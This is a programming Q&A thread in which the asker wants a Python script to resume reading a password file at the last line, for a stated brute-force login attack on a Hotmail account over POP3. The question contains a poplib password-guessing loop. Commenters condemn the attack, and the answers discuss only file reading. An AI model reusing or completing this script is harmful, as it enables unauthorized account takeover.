# How to re-read in the last point ! python

Tags: python

how to read txt file and stop then continue at last read line

```
example:
Joe
LOley
Hana fat
oh beef come one
```

example = the txt file
and that last line i had read it is Hana fat
so how i can continue ?
like that:

```
#!/usr/bin/python
#this script name is x.py don't forget that
import os
 f= open("Str1k3r.txt", "r")
for pwd in f.readlines():
    con(pwd.replace("\r", "").replace("\n", ""))
os.system('x.py')
```

x.py= the script file when i run it again he continue in last line he had read !
\\\\
why i need that ?because my script try to connect pop3.live.com
and try to log in with so many password  from txt file
and the only way to pass is run the script over and over again but with different line of the txt file
so how we can do ?
that my code .. so how to do it?
because my script try to connect pop3.live.com
and try to log in with so many password  from txt file
and the only way to pass is run the script over and over again but with different line of the txt file

that is my code

```
  import poplib
  def con(pwd):
    M = poplib.POP3_SSL('pop3.live.com', 995) 
    try:
        M.user("test123@hotmail.com")
        M.rset(M.pass_(pwd))
    except:
        print "[-]password incorrect"
    else:
        print '[+]really Password is:', pwd 
        exit()

f = open("Str1k3r.txt", "r")
for pwd in f.readlines():
```

Comment: By the way, which version of Python are you using?
If the file is under 20Mb, you can safely read it into memory first - then working with it is easier. You can traverse it with `for lineNum, line in enumerate(lines):`. The lineNum index will give you the ability to look at the last visited line. Since you are doing this in Python, I assume that speed is not that important ...

Comment: That's a very strange way to work. It might be easier to provide a good answer if you explain why you want to do this.

Comment: So, you're trying a brute force attack on a mail site, breaking into an account by guessing the password, but you get disconnected...good for them, I say.

Comment: I downvoted this back to 0 b/c it's basically a brute force attack on a user's Hotmail password. (which is usually illegal)

Answer (score 0):

you might want to try using seek(), tell() etc... See the [documents](http://docs.python.org/release/2.5.2/lib/bltin-file-objects.html) for more.

Answer (score 0):

```
f= open("Str1k3r.txt", "r")
for line in f:
    print line
    break

for line in f:
    print line # Continues with line 2 as f knows where it stopped
    break      # It's actually using file.next()
```

Answer (score 0):

Every time you execute 'x.py', you reopen the file - at the beginning.  That's what 'open' does.

If you want to continue reading, you'll probably want to arrange that the file is read from a known file descriptor - possibly standard input - so that you don't keep resetting it.  That said, you might have to worry about buffered I/O.  The first process might read a buffer full of the file, and only process part of the data in the buffer; the second process would continue where the I/O finished, not where the program finished.

Also, because you're using os.system(), you are gradually building up a set of processes that have not terminated, all waiting on their next child to die.  Investigate your 'exec' options.